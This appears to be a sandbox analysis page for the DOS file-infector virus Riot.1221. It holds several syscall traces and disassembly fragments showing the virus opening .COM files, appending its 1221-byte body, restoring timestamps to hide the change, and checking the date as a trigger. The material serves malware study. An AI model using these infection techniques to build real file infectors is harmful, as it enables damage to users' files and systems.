Sample viewer

vx.netlux.org/Virus.DOS.Riot.1221

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:44:08.044049375Z 71 PC: 12b37 | Get current directory
2018-12-17T22:44:08.047817333Z 59 PC: 12b43 | Change current directory
2018-12-17T22:44:08.052246524Z 26 PC: 12bf8 | Set disk transfer address
2018-12-17T22:44:08.05326705Z 78 PC: 12c06 | Find first file
2018-12-17T22:44:08.059685458Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:44:08.065967055Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
2018-12-17T22:44:08.072249187Z 44 PC: 12cae | Get time 0x12cae: add dl, dh
0x12cb0: je 0x12caa
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]
0x12cb9: mov byte ptr [si], dl
0x12cbb: mov ax, 0x4301
0x12cbe: xor cx, cx
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc
0x12cc6: int 0x21
0x12cc8: mov ah, 0x3e
0x12cca: int 0x21
0x12ccc: mov ax, 0x3d02
0x12ccf: int 0x21
0x12cd1: jae 0x12cd6
0x12cd3: jmp 0x12c52
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax
0x12cdd: xchg ax, bx
2018-12-17T22:44:08.075028053Z 67 PC: 12cc8 | Get or set file attributes
2018-12-17T22:44:08.092015458Z 62 PC: 12ccc | Close file
2018-12-17T22:44:08.093934664Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:44:08.113936Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:44:08.12076959Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:44:08.123292915Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:44:08.125724118Z 66 PC: 12d19 | Move file pointer
2018-12-17T22:44:08.128181746Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-17T22:44:08.319346212Z 87 PC: 12d33 | Get or set file date and time
2018-12-17T22:44:08.321266737Z 62 PC: 12d37 | Close file
2018-12-17T22:44:08.44289347Z 67 PC: 12d4a | Get or set file attributes
2018-12-17T22:44:08.452602841Z 79 PC: 12c19 | Find next file
2018-12-17T22:44:08.455136336Z 61 PC: 12c31 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:44:08.462619123Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
2018-12-17T22:44:08.469312318Z 44 PC: 12cae | Get time 0x12cae: add dl, dh
0x12cb0: je 0x12caa
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]
0x12cb9: mov byte ptr [si], dl
0x12cbb: mov ax, 0x4301
0x12cbe: xor cx, cx
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc
0x12cc6: int 0x21
0x12cc8: mov ah, 0x3e
0x12cca: int 0x21
0x12ccc: mov ax, 0x3d02
0x12ccf: int 0x21
0x12cd1: jae 0x12cd6
0x12cd3: jmp 0x12c52
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax
0x12cdd: xchg ax, bx
2018-12-17T22:44:08.471323019Z 67 PC: 12cc8 | Get or set file attributes
2018-12-17T22:44:08.482541841Z 62 PC: 12ccc | Close file
2018-12-17T22:44:08.484166576Z 61 PC: 12cd1 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:44:08.49080624Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:44:08.494655988Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:44:08.497258387Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:44:08.499775355Z 66 PC: 12d19 | Move file pointer
2018-12-17T22:44:08.501826014Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-17T22:44:08.511222483Z 87 PC: 12d33 | Get or set file date and time
2018-12-17T22:44:08.512738135Z 62 PC: 12d37 | Close file
2018-12-17T22:44:08.521416191Z 67 PC: 12d4a | Get or set file attributes
2018-12-17T22:44:08.538634671Z 79 PC: 12c19 | Find next file
2018-12-17T22:44:08.555792698Z 61 PC: 12c31 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:44:08.56062665Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
2018-12-17T22:44:08.565756582Z 44 PC: 12cae | Get time 0x12cae: add dl, dh
0x12cb0: je 0x12caa
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]
0x12cb9: mov byte ptr [si], dl
0x12cbb: mov ax, 0x4301
0x12cbe: xor cx, cx
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc
0x12cc6: int 0x21
0x12cc8: mov ah, 0x3e
0x12cca: int 0x21
0x12ccc: mov ax, 0x3d02
0x12ccf: int 0x21
0x12cd1: jae 0x12cd6
0x12cd3: jmp 0x12c52
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax
0x12cdd: xchg ax, bx
2018-12-17T22:44:08.567549843Z 67 PC: 12cc8 | Get or set file attributes
2018-12-17T22:44:08.576450448Z 62 PC: 12ccc | Close file
2018-12-17T22:44:08.579348063Z 61 PC: 12cd1 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:44:08.586462421Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:44:08.589471552Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:44:08.593792113Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:44:08.596266639Z 66 PC: 12d19 | Move file pointer
2018-12-17T22:44:08.598159033Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-17T22:44:08.614203144Z 87 PC: 12d33 | Get or set file date and time
2018-12-17T22:44:08.615762378Z 62 PC: 12d37 | Close file
2018-12-17T22:44:08.624260536Z 67 PC: 12d4a | Get or set file attributes
2018-12-17T22:44:08.636074418Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606
0x12b64: je 0x12b69
0x12b66: jmp 0x12dba
0x12b69: jmp 0x12d4f
0x12b6c: and ah, bh
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
0x12b74: add byte ptr [di - 0x75], dl
0x12b77: in al, dx
0x12b78: sub sp, 0x2c
0x12b7b: push si
0x12b7c: jmp 0x12bed
0x12b7e: mov ah, 0x1a
0x12b80: lea dx, word ptr [bp - 0x2c]
0x12b83: int 0x21
0x12b85: mov ah, 0x4e
0x12b87: mov cx, 0x10
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]
2018-12-17T22:44:08.63854939Z 59 PC: 12dc5 | Change current directory
2018-12-17T22:44:08.642993498Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8112,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:27.708817691Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:27.712414386Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:27.716617112Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:27.717428972Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:27.72131883Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:27.725739646Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:03:27.732763199Z 44 PC: 12cae | Get time 0x12cae: add dl, dh
0x12cb0: je 0x12caa
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]
0x12cb9: mov byte ptr [si], dl
0x12cbb: mov ax, 0x4301
0x12cbe: xor cx, cx
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc
0x12cc6: int 0x21
0x12cc8: mov ah, 0x3e
0x12cca: int 0x21
0x12ccc: mov ax, 0x3d02
0x12ccf: int 0x21
0x12cd1: jae 0x12cd6
0x12cd3: jmp 0x12c52
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax
0x12cdd: xchg ax, bx
2018-12-25T12:03:27.734843444Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:28.628718284Z 62 PC: 12ccc | Close file
2018-12-25T12:03:28.630830308Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.638206528Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:28.646665088Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.649880805Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.652883555Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:28.656416027Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:28.666935265Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:28.668574778Z 62 PC: 12d37 | Close file
2018-12-25T12:03:28.683262266Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:28.694617245Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:28.69906329Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.70762993Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.715195524Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.718203925Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.730747582Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.734030751Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.741752234Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.745656893Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.749547342Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.752450927Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.754539988Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.780563645Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.782523575Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.791487954Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:28.824590862Z 79 PC: 12c19 | Find next file (See above)
2018-12-25T12:03:28.82696713Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.834972225Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.844093206Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.846547846Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.859032362Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.862213672Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.87137708Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.875033156Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.878255751Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.881494984Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.883490099Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.893743677Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.895959404Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.904081996Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:28.915303352Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606
0x12b64: je 0x12b69
0x12b66: jmp 0x12dba
0x12b69: jmp 0x12d4f
0x12b6c: and ah, bh
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
0x12b74: add byte ptr [di - 0x75], dl
0x12b77: in al, dx
0x12b78: sub sp, 0x2c
0x12b7b: push si
0x12b7c: jmp 0x12bed
0x12b7e: mov ah, 0x1a
0x12b80: lea dx, word ptr [bp - 0x2c]
0x12b83: int 0x21
0x12b85: mov ah, 0x4e
0x12b87: mov cx, 0x10
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]
2018-12-25T12:03:28.918371168Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:28.923112863Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8112,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:27.902072923Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:27.905335239Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:27.909360353Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:27.910348151Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:27.921557715Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:27.932964863Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:03:27.944581798Z 44 PC: 12cae | Get time 0x12cae: add dl, dh
0x12cb0: je 0x12caa
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]
0x12cb9: mov byte ptr [si], dl
0x12cbb: mov ax, 0x4301
0x12cbe: xor cx, cx
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc
0x12cc6: int 0x21
0x12cc8: mov ah, 0x3e
0x12cca: int 0x21
0x12ccc: mov ax, 0x3d02
0x12ccf: int 0x21
0x12cd1: jae 0x12cd6
0x12cd3: jmp 0x12c52
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax
0x12cdd: xchg ax, bx
2018-12-25T12:03:27.947600058Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:27.972817168Z 62 PC: 12ccc | Close file
2018-12-25T12:03:27.974578373Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:27.981736242Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:27.984878222Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:27.98767371Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:27.991366027Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:27.993355289Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:27.999671814Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:28.001260205Z 62 PC: 12d37 | Close file
2018-12-25T12:03:28.009146344Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:28.018925016Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:28.021482882Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.028813269Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.035261261Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.03741264Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.047648911Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.049266683Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.060941083Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.067517234Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.069212146Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.074865877Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.07758969Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.083333384Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.084545494Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.091116819Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:28.097351973Z 79 PC: 12c19 | Find next file (See above)
2018-12-25T12:03:28.099218903Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.104042512Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.108600301Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.110456852Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.121662328Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.123467311Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.130858786Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.143184175Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.146047625Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.148857376Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.151672928Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.160976791Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.162478519Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.170268394Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:28.180893622Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606
0x12b64: je 0x12b69
0x12b66: jmp 0x12dba
0x12b69: jmp 0x12d4f
0x12b6c: and ah, bh
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
0x12b74: add byte ptr [di - 0x75], dl
0x12b77: in al, dx
0x12b78: sub sp, 0x2c
0x12b7b: push si
0x12b7c: jmp 0x12bed
0x12b7e: mov ah, 0x1a
0x12b80: lea dx, word ptr [bp - 0x2c]
0x12b83: int 0x21
0x12b85: mov ah, 0x4e
0x12b87: mov cx, 0x10
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]
2018-12-25T12:03:28.183425302Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:28.187688336Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8112,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:28.052926805Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:28.056537646Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:28.060863611Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:28.06193608Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:28.069305472Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.076581261Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:03:28.083369684Z 44 PC: 12cae | Get time 0x12cae: add dl, dh
0x12cb0: je 0x12caa
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]
0x12cb9: mov byte ptr [si], dl
0x12cbb: mov ax, 0x4301
0x12cbe: xor cx, cx
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc
0x12cc6: int 0x21
0x12cc8: mov ah, 0x3e
0x12cca: int 0x21
0x12ccc: mov ax, 0x3d02
0x12ccf: int 0x21
0x12cd1: jae 0x12cd6
0x12cd3: jmp 0x12c52
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax
0x12cdd: xchg ax, bx
2018-12-25T12:03:28.085947553Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:28.627682554Z 62 PC: 12ccc | Close file
2018-12-25T12:03:28.630279144Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.646277416Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:28.654564433Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.657589798Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.660713972Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:28.666149339Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:28.679917043Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:28.681972752Z 62 PC: 12d37 | Close file
2018-12-25T12:03:28.692260962Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:28.704122677Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:28.707565785Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.716439343Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.724084828Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.727419935Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.739602104Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.74215545Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.74996322Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.753747671Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.757785071Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.760826872Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.76311406Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.774461512Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.776685665Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.785786131Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:28.800059324Z 79 PC: 12c19 | Find next file (See above)
2018-12-25T12:03:28.803426731Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.810818928Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.819819132Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.822464897Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.83419371Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.836959295Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.844768195Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.848232106Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.852012949Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.855287034Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.857805029Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.868502035Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.870794353Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.879669981Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:28.891055628Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606
0x12b64: je 0x12b69
0x12b66: jmp 0x12dba
0x12b69: jmp 0x12d4f
0x12b6c: and ah, bh
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
0x12b74: add byte ptr [di - 0x75], dl
0x12b77: in al, dx
0x12b78: sub sp, 0x2c
0x12b7b: push si
0x12b7c: jmp 0x12bed
0x12b7e: mov ah, 0x1a
0x12b80: lea dx, word ptr [bp - 0x2c]
0x12b83: int 0x21
0x12b85: mov ah, 0x4e
0x12b87: mov cx, 0x10
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]
2018-12-25T12:03:28.894908792Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:28.900025515Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8112,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:28.128708015Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:28.13287615Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:28.137377755Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:28.138862262Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:28.146670702Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.153197608Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:03:28.160718537Z 44 PC: 12cae | Get time 0x12cae: add dl, dh
0x12cb0: je 0x12caa
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]
0x12cb9: mov byte ptr [si], dl
0x12cbb: mov ax, 0x4301
0x12cbe: xor cx, cx
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc
0x12cc6: int 0x21
0x12cc8: mov ah, 0x3e
0x12cca: int 0x21
0x12ccc: mov ax, 0x3d02
0x12ccf: int 0x21
0x12cd1: jae 0x12cd6
0x12cd3: jmp 0x12c52
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax
0x12cdd: xchg ax, bx
2018-12-25T12:03:28.163807782Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:28.180886487Z 62 PC: 12ccc | Close file
2018-12-25T12:03:28.182888414Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.190378831Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:28.192773051Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.195491023Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.197332377Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:28.198851145Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:28.20507867Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:28.206327778Z 62 PC: 12d37 | Close file
2018-12-25T12:03:28.21194643Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:28.222026471Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:28.224967343Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.232713121Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.239238479Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.24158344Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.258165461Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.260039035Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.271353013Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.279134522Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.282121749Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.284767446Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.287096959Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.296530156Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.298388364Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.306371524Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:28.317120231Z 79 PC: 12c19 | Find next file (See above)
2018-12-25T12:03:28.320066613Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.326793459Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.333759436Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.336070164Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.346639589Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.349463769Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.356104219Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.358762152Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.362252882Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.365036364Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.36710834Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.377264144Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.379082023Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.386553081Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:28.397163297Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606
0x12b64: je 0x12b69
0x12b66: jmp 0x12dba
0x12b69: jmp 0x12d4f
0x12b6c: and ah, bh
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
0x12b74: add byte ptr [di - 0x75], dl
0x12b77: in al, dx
0x12b78: sub sp, 0x2c
0x12b7b: push si
0x12b7c: jmp 0x12bed
0x12b7e: mov ah, 0x1a
0x12b80: lea dx, word ptr [bp - 0x2c]
0x12b83: int 0x21
0x12b85: mov ah, 0x4e
0x12b87: mov cx, 0x10
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]
2018-12-25T12:03:28.399385631Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:28.403244889Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8112,"SideJobID":0}

.

GIF

